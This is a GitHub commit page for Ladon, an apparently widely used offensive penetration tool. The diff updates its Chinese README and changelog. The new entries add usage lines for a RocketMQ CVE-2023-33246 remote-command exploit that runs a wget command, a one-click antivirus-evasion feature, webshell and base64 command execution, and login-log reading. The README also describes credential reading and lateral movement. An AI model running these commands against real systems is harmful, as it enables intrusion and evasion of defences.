Add files via upload

k8gege · Jun 18, 2023 · 1edf6c1 · 1edf6c1
1 parent 473cde8
commit 1edf6c1
Show file tree

Hide file tree

Showing 9 changed files with 140 additions and 8 deletions.
diff --git a/ChatLadon.exe b/ChatLadon.exe
diff --git a/Ladon911.exe b/Ladon911.exe
diff --git a/Ladon911_20230618.ps1 b/Ladon911_20230618.ps1
diff --git a/LadonExp.exe b/LadonExp.exe
diff --git a/LadonGUI.exe b/LadonGUI.exe
diff --git a/LadonShell.exe b/LadonShell.exe
diff --git a/LadonStudy.exe b/LadonStudy.exe
diff --git a/README.md b/README.md
@@ -1,8 +1,8 @@
-## Ladon 10.10.6 20230601
+## Ladon 11.0 20230618
 ![](https://k8gege.github.io/k8img/Ladon/Dragon.jpg)
 
 [![Author](https://img.shields.io/badge/Author-k8gege-blueviolet)](https://github.com/k8gege) 
-[![Ladon](https://img.shields.io/badge/Ladon-10.10.6-yellowgreen)](https://github.com/k8gege/Ladon) 
+[![Ladon](https://img.shields.io/badge/Ladon-11.0-yellowgreen)](https://github.com/k8gege/Ladon) 
 [![Bin](https://img.shields.io/badge/Ladon-Bin-ff69b4)](https://github.com/k8gege/Ladon/releases) 
 [![GitHub issues](https://img.shields.io/github/issues/k8gege/Ladon)](https://github.com/k8gege/Ladon/issues) 
 [![Github Stars](https://img.shields.io/github/stars/k8gege/Ladon)](https://github.com/k8gege/Ladon) 
@@ -16,7 +16,7 @@
 
 ### 程序简介
 
-Ladon大型内网渗透工具，可PowerShell模块化、可CS插件化、可内存加载，无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描等。10.10.6版本内置230功能模块,网络资产探测模块30+协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息，高危漏洞检测16+包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等，密码审计25+含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等，远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+（Web应用、中间件、脚本类型、页面类型）等，本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令，EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。
+Ladon大型内网渗透工具，可PowerShell模块化、可CS插件化、可内存加载，无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描等。11.0版本内置234功能模块,网络资产探测模块30+协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息，高危漏洞检测16+包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等，密码审计25+含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等，远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+（Web应用、中间件、脚本类型、页面类型）等，本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令，EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。
 
 ### 使用简单
 
@@ -97,10 +97,6 @@ Windows版本: .Net、Cobalt Strike、PowerShell<br>
 全系统版本：GO(全平台)、Python(理论上全平台)<br>
 PS: Study方便本地测试使用，完整功能请使用CMD
 
-### 版本
-Ladon 10.10.6 20230601<br>
-简明用法例子 230例<br>
-
 ### 001 自定义线程扫描
 例子：扫描目标10.1.2段是否存在MS17010漏洞<br>
 单线程：Ladon 10.1.2.8/24 MS17010 t=1<br>
@@ -1576,6 +1572,30 @@ Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p
 Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p
 ```
 
+##### 231 RunCmd/Cmd  执行Cmd命令/支持b64cmd
+```Bash	
+Ladon cmd whoami
+Ladon b64cmd d2hvYW1p 
+```
+
+##### 232 查看管理员IP、一键读取登陆成功日志4624
+```Bash	
+Ladon LoginLog
+Ladon EventLog 
+```
+
+##### 233 Apache RocketMQ CVE-2023-33246 远程命令执行漏洞EXP
+```Bash	
+Ladon RocketMQexp <ip> 10911 <command>
+Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
+```
+
+##### 234 Ladon一键免杀工具
+```Bash	
+Ladon BypassAV py xor anyNet.exe
+```
+
+
 =======================================================
 
 ### Example

diff --git a/update.txt b/update.txt
@@ -25,11 +25,20 @@ ChatLadon		渗透机器人，也可当成学习模式，只要会聊天，就能
 =========================================================================
 
 
+Ladon 11  2023.6.18
+[+]RocketMQexp				Apache RocketMQ CVE-2023-33246 远程命令执行漏洞EXP (可Ladon渗透Web服务器获取回显)
+[+]BypassAV					Ladon一键免杀工具 PY XOR随机加密 (Main函数需Public）
+[u]InfoScan					修复异常退出Bug
+[+]EventLog/LoginLog		一键读取登陆成功日志4624  错误4625要是爆破日志会很大
+[u]Exp、GUI、Study、Chat	更新UI按钮背景
+
+[+]RunCmd/Cmd				执行Cmd命令/支持b64cmd	Ladon cmd whoami 或 Ladon b64cmd d2hvYW1p 
+[+]RunPS/PowerShell			执行PowerShell命令/脚本 Ladon powershell c $PSVersionTable
 
 20230603
 [u]LadonExp 					支持GET连接MS17010漏洞CmdShell执行命令
 [u]LadonExp						生成EXE可解密Base64、Hex  PostShell结果
-[u]PowerShell					生成EXE可解密Base64、Hex  PostShell结果
+[+]PostShell				    增加HEX加密传输HEX解密结果,Base64结果解密Bug修复
 
 Ladon 10.10.6 20230528
 [+]PostShell				    Post提交CmdShell客户端，如CMD小马pwd=whoami执行命令，支持Post、Cookie、UserAgent、Referer等提交